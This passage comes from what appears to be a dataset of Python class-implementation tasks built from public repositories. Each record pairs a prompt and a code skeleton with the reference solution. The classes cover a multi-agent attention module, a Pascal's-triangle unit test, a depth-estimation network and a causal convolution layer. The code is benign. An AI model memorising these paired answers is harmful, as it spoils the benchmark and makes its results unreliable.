observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation", "name": "_cut_obs", "signature": "def _cut_obs(self, obs: torch.Tensor)"}, {"docstring": "Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation", "name": "forward", "signature": "def forward(self, inputs: torch.Tensor)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007126", "prompt": "Implement the Python class `CollaQSMACAttentionModule` described below.\n\nClass description:\nOverview: Collaq attention module. Used to get agent's attention observation. It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\n\nMethod signatures and docstrings:\n- def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int): Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\n- def _cut_obs(self, obs: torch.Tensor): Overview: cut the observed information into self's observation and ally's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\n- def forward(self, inputs: torch.Tensor): Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation", "prompted_full_text": "Implement the Python class `CollaQSMACAttentionModule` described below.\n\nClass description:\nOverview: Collaq attention module. Used to get agent's attention observation. 
It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\n\nMethod signatures and docstrings:\n- def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int): Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\n- def _cut_obs(self, obs: torch.Tensor): Overview: cut the observed information into self's observation and ally's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\n- def forward(self, inputs: torch.Tensor): Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation\n\n<|skeleton|>\nclass CollaQSMACAttentionModule:\n \"\"\"Overview: Collaq attention module. Used to get agent's attention observation. It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\"\"\"\n\n def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int):\n \"\"\"Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\"\"\"\n <|body_0|>\n\n def _cut_obs(self, obs: torch.Tensor):\n \"\"\"Overview: cut the observed information into self's observation and ally's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\"\"\"\n <|body_1|>\n\n def forward(self, inputs: torch.Tensor):\n \"\"\"Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CollaQSMACAttentionModule, self).__init__()\n self.self_feature_range = self_feature_range\n self.ally_feature_range = ally_feature_range\n self.attention_layer = CollaQMultiHeadAttention(1, q_dim, v_dim, attention_size, attention_size, attention_size)\n<|end_body_0|>\n\n<|body_start_1|>\n self_features = obs[:, :, :, self.self_feature_range[0]:self.self_feature_range[1]]\n ally_features = obs[:, :, :, self.ally_feature_range[0]:self.ally_feature_range[1]]\n return (self_features, ally_features)\n<|end_body_1|>\n\n<|body_start_2|>\n obs = inputs\n self_features, ally_features = 
self._cut_obs(obs)\n T, B, A, _ = self_features.shape\n self_features = self_features.reshape(T * B * A, 1, -1)\n ally_features = ally_features.reshape(T * B * A, A - 1, -1)\n self_features, ally_features = self.attention_layer(self_features, ally_features, ally_features)\n self_features = self_features.reshape(T, B, A, -1)\n ally_features = ally_features.reshape(T, B, A, -1)\n obs = torch.cat([obs[:, :, :, :self.self_feature_range[0]], self_features, ally_features, obs[:, :, :, self.ally_feature_range[1]:]], dim=-1)\n return obs\n<|end_body_2|>\n", "revision_id": "eb483fa6e46602d58c8e7d2ca1e566adca28e703", "skeleton": "<|skeleton|>\nclass CollaQSMACAttentionModule:\n \"\"\"Overview: Collaq attention module. Used to get agent's attention observation. It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\"\"\"\n\n def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int):\n \"\"\"Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\"\"\"\n <|body_0|>\n\n def _cut_obs(self, obs: torch.Tensor):\n \"\"\"Overview: cut the observed information into self's observation and ally's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\"\"\"\n <|body_1|>\n\n def forward(self, inputs: torch.Tensor):\n \"\"\"Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CollaQSMACAttentionModule:\n \"\"\"Overview: Collaq attention module. Used to get agent's attention observation. 
It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\"\"\"\n\n def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int):\n \"\"\"Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\"\"\"\n super(CollaQSMACAttentionModule, self).__init__()\n self.self_feature_range = self_feature_range\n self.ally_feature_range = ally_feature_range\n self.attention_layer = CollaQMultiHeadAttention(1, q_dim, v_dim, attention_size, attention_size, attention_size)\n\n def _cut_obs(self, obs: torch.Tensor):\n \"\"\"Overview: cut the observed information into self's observation and ally's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\"\"\"\n self_features = obs[:, :, :, self.self_feature_range[0]:self.self_feature_range[1]]\n ally_features = obs[:, :, :, self.ally_feature_range[0]:self.ally_feature_range[1]]\n return (self_features, ally_features)\n\n def forward(self, inputs: torch.Tensor):\n \"\"\"Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation\"\"\"\n obs = inputs\n self_features, ally_features = self._cut_obs(obs)\n T, B, A, _ = self_features.shape\n self_features = self_features.reshape(T * B * A, 1, -1)\n ally_features = ally_features.reshape(T * B * A, A - 1, -1)\n self_features, ally_features = self.attention_layer(self_features, ally_features, ally_features)\n self_features = self_features.reshape(T, B, A, -1)\n ally_features = ally_features.reshape(T, B, A, -1)\n obs = torch.cat([obs[:, :, :, :self.self_feature_range[0]], self_features, ally_features, obs[:, :, :, self.ally_feature_range[1]:]], dim=-1)\n return obs\n", "source": "the_stack_v2_python_sparse", "source_path": "ding/model/template/qmix.py", "source_repo": "shengxuesun/DI-engine", "split": "test", "star_events_count": 1} {"blob_id": "f44e97691dab25cc4a87f43c0438723163d80bd0", "bodies": ["for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.C(location[0], location[1])\n self.assertEqual(pascal_value, result)", "for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.calc_pascal_value(location[0], location[1])\n self.assertEqual(pascal_value, result)"], "bodies_text": "<|body_start_0|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.C(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_0|>\n\n<|body_start_1|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.calc_pascal_value(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "TestProblem1", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", 
"full_text": "<|skeleton|>\nclass TestProblem1:\n\n def test_method_C_to_known_values(self):\n \"\"\"C function should give known result with known input\"\"\"\n <|body_0|>\n\n def test_method_calc_pascal_value_to_known_values(self):\n \"\"\"calc_pascal_value function should give known result with known input\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.C(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_0|>\n\n<|body_start_1|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.calc_pascal_value(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000153", "length_bytes": 1035, "license_type": "no_license", "methods": [{"docstring": "C function should give known result with known input", "name": "test_method_C_to_known_values", "signature": "def test_method_C_to_known_values(self)"}, {"docstring": "calc_pascal_value function should give known result with known input", "name": "test_method_calc_pascal_value_to_known_values", "signature": "def test_method_calc_pascal_value_to_known_values(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005776", "prompt": "Implement the Python class `TestProblem1` described below.\n\nClass description:\nImplement the TestProblem1 class.\n\nMethod signatures and docstrings:\n- def test_method_C_to_known_values(self): C function should give known result with known input\n- def test_method_calc_pascal_value_to_known_values(self): calc_pascal_value function should give known result with known input", "prompted_full_text": "Implement the Python class `TestProblem1` described below.\n\nClass description:\nImplement the TestProblem1 class.\n\nMethod signatures and docstrings:\n- def test_method_C_to_known_values(self): C function should give known result with known input\n- def test_method_calc_pascal_value_to_known_values(self): calc_pascal_value function should give known result with known input\n\n<|skeleton|>\nclass TestProblem1:\n\n def test_method_C_to_known_values(self):\n \"\"\"C function should give known result with known input\"\"\"\n <|body_0|>\n\n def test_method_calc_pascal_value_to_known_values(self):\n \"\"\"calc_pascal_value function should give known result with known input\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.C(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_0|>\n\n<|body_start_1|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.calc_pascal_value(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_1|>\n", "revision_id": "9a21945735add7739b062be4cd016525c592f23d", "skeleton": "<|skeleton|>\nclass TestProblem1:\n\n def test_method_C_to_known_values(self):\n \"\"\"C function should give known result with known input\"\"\"\n <|body_0|>\n\n def test_method_calc_pascal_value_to_known_values(self):\n \"\"\"calc_pascal_value function should give known result with known input\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestProblem1:\n def test_method_C_to_known_values(self):\n \"\"\"C function should give known result with known input\"\"\"\n for location, pascal_value in 
self.knownValues:\n result = explore_pascals_triangle.C(location[0], location[1])\n self.assertEqual(pascal_value, result)\n\n def test_method_calc_pascal_value_to_known_values(self):\n \"\"\"calc_pascal_value function should give known result with known input\"\"\"\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.calc_pascal_value(location[0], location[1])\n self.assertEqual(pascal_value, result)\n", "source": "the_stack_v2_python_sparse", "source_path": "test_pascal_triangle_values.py", "source_repo": "afcarl/python-algorithms-1", "split": "test", "star_events_count": 0} {"blob_id": "1fc8e5c695007c61734c84b725d8c559e698fee2", "bodies": ["super().__init__()\nif path:\n use_pretrained = False\nelse:\n use_pretrained = True\nresnet = models.resnet50(pretrained=use_pretrained)\nself.pretrained = nn.Module()\nself.scratch = nn.Module()\nself.pretrained.layer1 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1)\nself.pretrained.layer2 = resnet.layer2\nself.pretrained.layer3 = resnet.layer3\nself.pretrained.layer4 = resnet.layer4\nself.scratch.layer1_rn = nn.Conv2d(256, features, kernel_size=3, stride=1, padding=1, bias=False)\nself.scratch.layer2_rn = nn.Conv2d(512, features, kernel_size=3, stride=1, padding=1, bias=False)\nself.scratch.layer3_rn = nn.Conv2d(1024, features, kernel_size=3, stride=1, padding=1, bias=False)\nself.scratch.layer4_rn = nn.Conv2d(2048, features, kernel_size=3, stride=1, padding=1, bias=False)\nself.scratch.refinenet4 = FeatureFusionBlock(features)\nself.scratch.refinenet3 = FeatureFusionBlock(features)\nself.scratch.refinenet2 = FeatureFusionBlock(features)\nself.scratch.refinenet1 = FeatureFusionBlock(features)\nself.scratch.output_conv = nn.Sequential(nn.Conv2d(features, 128, kernel_size=3, stride=1, padding=1), nn.Conv2d(128, 1, kernel_size=3, stride=1, padding=1), Interpolate(scale_factor=2, mode='bilinear'))\nif path:\n self.load(path)", "layer_1 = self.pretrained.layer1(x)\nlayer_2 = self.pretrained.layer2(layer_1)\nlayer_3 = self.pretrained.layer3(layer_2)\nlayer_4 = self.pretrained.layer4(layer_3)\nlayer_1_rn = self.scratch.layer1_rn(layer_1)\nlayer_2_rn = self.scratch.layer2_rn(layer_2)\nlayer_3_rn = self.scratch.layer3_rn(layer_3)\nlayer_4_rn = self.scratch.layer4_rn(layer_4)\npath_4 = self.scratch.refinenet4(layer_4_rn)\npath_3 = self.scratch.refinenet3(path_4, layer_3_rn)\npath_2 = self.scratch.refinenet2(path_3, layer_2_rn)\npath_1 = self.scratch.refinenet1(path_2, layer_1_rn)\nout = self.scratch.output_conv(path_1)\nreturn torch.squeeze(out, dim=1)", "parameters = torch.load(path)\nif 'optimizer' in parameters:\n parameters = parameters['model']\nself.load_state_dict(parameters)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n if path:\n use_pretrained = False\n else:\n use_pretrained = True\n resnet = models.resnet50(pretrained=use_pretrained)\n self.pretrained = nn.Module()\n self.scratch = nn.Module()\n self.pretrained.layer1 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1)\n self.pretrained.layer2 = resnet.layer2\n self.pretrained.layer3 = resnet.layer3\n self.pretrained.layer4 = resnet.layer4\n self.scratch.layer1_rn = nn.Conv2d(256, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer2_rn = nn.Conv2d(512, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer3_rn = nn.Conv2d(1024, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer4_rn = nn.Conv2d(2048, 
features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.refinenet4 = FeatureFusionBlock(features)\n self.scratch.refinenet3 = FeatureFusionBlock(features)\n self.scratch.refinenet2 = FeatureFusionBlock(features)\n self.scratch.refinenet1 = FeatureFusionBlock(features)\n self.scratch.output_conv = nn.Sequential(nn.Conv2d(features, 128, kernel_size=3, stride=1, padding=1), nn.Conv2d(128, 1, kernel_size=3, stride=1, padding=1), Interpolate(scale_factor=2, mode='bilinear'))\n if path:\n self.load(path)\n<|end_body_0|>\n\n<|body_start_1|>\n layer_1 = self.pretrained.layer1(x)\n layer_2 = self.pretrained.layer2(layer_1)\n layer_3 = self.pretrained.layer3(layer_2)\n layer_4 = self.pretrained.layer4(layer_3)\n layer_1_rn = self.scratch.layer1_rn(layer_1)\n layer_2_rn = self.scratch.layer2_rn(layer_2)\n layer_3_rn = self.scratch.layer3_rn(layer_3)\n layer_4_rn = self.scratch.layer4_rn(layer_4)\n path_4 = self.scratch.refinenet4(layer_4_rn)\n path_3 = self.scratch.refinenet3(path_4, layer_3_rn)\n path_2 = self.scratch.refinenet2(path_3, layer_2_rn)\n path_1 = self.scratch.refinenet1(path_2, layer_1_rn)\n out = self.scratch.output_conv(path_1)\n return torch.squeeze(out, dim=1)\n<|end_body_1|>\n\n<|body_start_2|>\n parameters = torch.load(path)\n if 'optimizer' in parameters:\n parameters = parameters['model']\n self.load_state_dict(parameters)\n<|end_body_2|>\n", "class_docstring": "Network for monocular depth estimation.", "class_name": "MidasNetOld", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MidasNetOld:\n \"\"\"Network for monocular depth estimation.\"\"\"\n\n def __init__(self, path=None, features=256):\n \"\"\"Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\"\"\"\n <|body_1|>\n\n def load(self, path):\n \"\"\"Load model from file. 
Args: path (str): file path\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n if path:\n use_pretrained = False\n else:\n use_pretrained = True\n resnet = models.resnet50(pretrained=use_pretrained)\n self.pretrained = nn.Module()\n self.scratch = nn.Module()\n self.pretrained.layer1 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1)\n self.pretrained.layer2 = resnet.layer2\n self.pretrained.layer3 = resnet.layer3\n self.pretrained.layer4 = resnet.layer4\n self.scratch.layer1_rn = nn.Conv2d(256, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer2_rn = nn.Conv2d(512, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer3_rn = nn.Conv2d(1024, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer4_rn = nn.Conv2d(2048, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.refinenet4 = FeatureFusionBlock(features)\n self.scratch.refinenet3 = FeatureFusionBlock(features)\n self.scratch.refinenet2 = FeatureFusionBlock(features)\n self.scratch.refinenet1 = FeatureFusionBlock(features)\n self.scratch.output_conv = nn.Sequential(nn.Conv2d(features, 128, kernel_size=3, stride=1, padding=1), nn.Conv2d(128, 1, kernel_size=3, stride=1, padding=1), Interpolate(scale_factor=2, mode='bilinear'))\n if path:\n self.load(path)\n<|end_body_0|>\n\n<|body_start_1|>\n layer_1 = self.pretrained.layer1(x)\n layer_2 = self.pretrained.layer2(layer_1)\n layer_3 = self.pretrained.layer3(layer_2)\n layer_4 = self.pretrained.layer4(layer_3)\n layer_1_rn = self.scratch.layer1_rn(layer_1)\n layer_2_rn = self.scratch.layer2_rn(layer_2)\n layer_3_rn = self.scratch.layer3_rn(layer_3)\n layer_4_rn = self.scratch.layer4_rn(layer_4)\n path_4 = self.scratch.refinenet4(layer_4_rn)\n path_3 = self.scratch.refinenet3(path_4, layer_3_rn)\n path_2 = self.scratch.refinenet2(path_3, layer_2_rn)\n path_1 = self.scratch.refinenet1(path_2, layer_1_rn)\n out = self.scratch.output_conv(path_1)\n return torch.squeeze(out, dim=1)\n<|end_body_1|>\n\n<|body_start_2|>\n parameters = torch.load(path)\n if 'optimizer' in parameters:\n parameters = parameters['model']\n self.load_state_dict(parameters)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000154", "length_bytes": 5777, "license_type": "permissive", "methods": [{"docstring": "Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.", "name": "__init__", "signature": "def __init__(self, path=None, features=256)"}, {"docstring": "Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth", "name": "forward", "signature": "def forward(self, x)"}, {"docstring": "Load model from file. Args: path (str): file path", "name": "load", "signature": "def load(self, path)"}], "n_methods": 3, "prompt": "Implement the Python class `MidasNetOld` described below.\n\nClass description:\nNetwork for monocular depth estimation.\n\nMethod signatures and docstrings:\n- def __init__(self, path=None, features=256): Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\n- def forward(self, x): Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\n- def load(self, path): Load model from file. 
Args: path (str): file path", "prompted_full_text": "Implement the Python class `MidasNetOld` described below.\n\nClass description:\nNetwork for monocular depth estimation.\n\nMethod signatures and docstrings:\n- def __init__(self, path=None, features=256): Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\n- def forward(self, x): Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\n- def load(self, path): Load model from file. Args: path (str): file path\n\n<|skeleton|>\nclass MidasNetOld:\n \"\"\"Network for monocular depth estimation.\"\"\"\n\n def __init__(self, path=None, features=256):\n \"\"\"Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\"\"\"\n <|body_1|>\n\n def load(self, path):\n \"\"\"Load model from file. Args: path (str): file path\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n if path:\n use_pretrained = False\n else:\n use_pretrained = True\n resnet = models.resnet50(pretrained=use_pretrained)\n self.pretrained = nn.Module()\n self.scratch = nn.Module()\n self.pretrained.layer1 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1)\n self.pretrained.layer2 = resnet.layer2\n self.pretrained.layer3 = resnet.layer3\n self.pretrained.layer4 = resnet.layer4\n self.scratch.layer1_rn = nn.Conv2d(256, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer2_rn = nn.Conv2d(512, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer3_rn = nn.Conv2d(1024, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer4_rn = nn.Conv2d(2048, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.refinenet4 = FeatureFusionBlock(features)\n self.scratch.refinenet3 = FeatureFusionBlock(features)\n self.scratch.refinenet2 = FeatureFusionBlock(features)\n self.scratch.refinenet1 = FeatureFusionBlock(features)\n self.scratch.output_conv = nn.Sequential(nn.Conv2d(features, 128, kernel_size=3, stride=1, padding=1), nn.Conv2d(128, 1, kernel_size=3, stride=1, padding=1), Interpolate(scale_factor=2, mode='bilinear'))\n if path:\n self.load(path)\n<|end_body_0|>\n\n<|body_start_1|>\n layer_1 = self.pretrained.layer1(x)\n layer_2 = self.pretrained.layer2(layer_1)\n layer_3 = self.pretrained.layer3(layer_2)\n layer_4 = self.pretrained.layer4(layer_3)\n layer_1_rn = self.scratch.layer1_rn(layer_1)\n layer_2_rn = self.scratch.layer2_rn(layer_2)\n layer_3_rn = self.scratch.layer3_rn(layer_3)\n layer_4_rn = self.scratch.layer4_rn(layer_4)\n path_4 = self.scratch.refinenet4(layer_4_rn)\n path_3 = self.scratch.refinenet3(path_4, layer_3_rn)\n path_2 = self.scratch.refinenet2(path_3, layer_2_rn)\n path_1 = self.scratch.refinenet1(path_2, layer_1_rn)\n out = self.scratch.output_conv(path_1)\n return torch.squeeze(out, dim=1)\n<|end_body_1|>\n\n<|body_start_2|>\n parameters = torch.load(path)\n if 'optimizer' in parameters:\n parameters = parameters['model']\n self.load_state_dict(parameters)\n<|end_body_2|>\n", "revision_id": "a00c3619bf4042e446e1919087f0b09fe9fa3a65", "skeleton": "<|skeleton|>\nclass MidasNetOld:\n \"\"\"Network for monocular depth estimation.\"\"\"\n\n def __init__(self, path=None, features=256):\n \"\"\"Init. 
Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\"\"\"\n <|body_1|>\n\n def load(self, path):\n \"\"\"Load model from file. Args: path (str): file path\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MidasNetOld:\n \"\"\"Network for monocular depth estimation.\"\"\"\n\n def __init__(self, path=None, features=256):\n \"\"\"Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\"\"\"\n super().__init__()\n if path:\n use_pretrained = False\n else:\n use_pretrained = True\n resnet = models.resnet50(pretrained=use_pretrained)\n self.pretrained = nn.Module()\n self.scratch = nn.Module()\n self.pretrained.layer1 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1)\n self.pretrained.layer2 = resnet.layer2\n self.pretrained.layer3 = resnet.layer3\n self.pretrained.layer4 = resnet.layer4\n self.scratch.layer1_rn = nn.Conv2d(256, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer2_rn = nn.Conv2d(512, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer3_rn = nn.Conv2d(1024, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer4_rn = nn.Conv2d(2048, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.refinenet4 = FeatureFusionBlock(features)\n self.scratch.refinenet3 = FeatureFusionBlock(features)\n self.scratch.refinenet2 = FeatureFusionBlock(features)\n self.scratch.refinenet1 = FeatureFusionBlock(features)\n self.scratch.output_conv = nn.Sequential(nn.Conv2d(features, 128, kernel_size=3, stride=1, padding=1), nn.Conv2d(128, 1, kernel_size=3, stride=1, padding=1), Interpolate(scale_factor=2, mode='bilinear'))\n if path:\n self.load(path)\n\n def forward(self, x):\n \"\"\"Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\"\"\"\n layer_1 = self.pretrained.layer1(x)\n layer_2 = self.pretrained.layer2(layer_1)\n layer_3 = self.pretrained.layer3(layer_2)\n layer_4 = self.pretrained.layer4(layer_3)\n layer_1_rn = self.scratch.layer1_rn(layer_1)\n layer_2_rn = self.scratch.layer2_rn(layer_2)\n layer_3_rn = self.scratch.layer3_rn(layer_3)\n layer_4_rn = self.scratch.layer4_rn(layer_4)\n path_4 = self.scratch.refinenet4(layer_4_rn)\n path_3 = self.scratch.refinenet3(path_4, layer_3_rn)\n path_2 = self.scratch.refinenet2(path_3, layer_2_rn)\n path_1 = self.scratch.refinenet1(path_2, layer_1_rn)\n out = self.scratch.output_conv(path_1)\n return torch.squeeze(out, dim=1)\n\n def load(self, path):\n \"\"\"Load model from file. 
Args: path (str): file path\"\"\"\n parameters = torch.load(path)\n if 'optimizer' in parameters:\n parameters = parameters['model']\n self.load_state_dict(parameters)\n", "source": "the_stack_v2_python_sparse", "source_path": "nasws/cnn/search_space/monodepth/models/midas_net_old.py", "source_repo": "kcyu2014/nas-landmarkreg", "split": "test", "star_events_count": 10} {"blob_id": "d467e4aad74e0b846830603633fb678cca505b25", "bodies": ["super().__init__()\nself.padding = (kernel_size - 1) * dilation\nself.causal_conv1d = torch.nn.Conv1d(idim, odim, kernel_size=kernel_size, stride=stride, padding=self.padding, dilation=dilation, groups=groups, bias=bias)\nself.dropout = torch.nn.Dropout(p=dropout_rate)\nif batch_norm:\n self.bn = torch.nn.BatchNorm1d(odim)\nif relu:\n self.relu_func = torch.nn.ReLU()\nself.batch_norm = batch_norm\nself.relu = relu", "sequence = sequence.transpose(1, 2)\nsequence = self.causal_conv1d(sequence)\nif self.padding != 0:\n sequence = sequence[:, :, :-self.padding]\nif self.batch_norm:\n sequence = self.bn(sequence)\nsequence = self.dropout(sequence)\nif self.relu:\n sequence = self.relu_func(sequence)\nsequence = sequence.transpose(1, 2)\nreturn (sequence, mask)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.padding = (kernel_size - 1) * dilation\n self.causal_conv1d = torch.nn.Conv1d(idim, odim, kernel_size=kernel_size, stride=stride, padding=self.padding, dilation=dilation, groups=groups, bias=bias)\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n if batch_norm:\n self.bn = torch.nn.BatchNorm1d(odim)\n if relu:\n self.relu_func = torch.nn.ReLU()\n self.batch_norm = batch_norm\n self.relu = relu\n<|end_body_0|>\n\n<|body_start_1|>\n sequence = sequence.transpose(1, 2)\n sequence = self.causal_conv1d(sequence)\n if self.padding != 0:\n sequence = sequence[:, :, :-self.padding]\n if self.batch_norm:\n sequence = self.bn(sequence)\n sequence = self.dropout(sequence)\n if self.relu:\n sequence = self.relu_func(sequence)\n sequence = sequence.transpose(1, 2)\n return (sequence, mask)\n<|end_body_1|>\n", "class_docstring": "1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. 